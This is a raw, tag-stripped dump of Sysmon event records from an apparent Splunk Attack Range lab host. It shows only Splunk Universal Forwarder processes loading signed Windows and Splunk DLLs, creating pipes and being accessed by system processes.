19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606261Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x80000000000000001606260Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606259Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.029{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-65AF-6080-4F5E-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606258Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.029{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606257Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.029{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606256Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:31.029{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606255Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.029{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606254Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:31.029{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606253Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.029{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606252Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:31.029{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 734700x80000000000000001606482Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.965{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001606481Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.965{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001606480Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.965{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001606479Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.965{21761711-7A88-6080-C760-00000000BB01}5668\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x80000000000000001606478Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001606477Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x80000000000000001606476Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001606475Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001606474Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001606473Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001606472Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001606471Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001606470Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001606469Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001606468Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606467Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001606466Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001606465Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001606464Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001606463Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001606462Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001606461Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001606460Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001606459Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001606458Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606457Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001606456Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606455Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606454Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606453Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606452Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606451Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606450Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606449Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606448Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606447Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606446Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606445Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001606444Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606443Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606442Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606441Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606440Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8trueSplunk, Inc.Valid 10341000x80000000000000001606439Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.949{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-7A88-6080-C760-00000000BB01}5668C:\Program 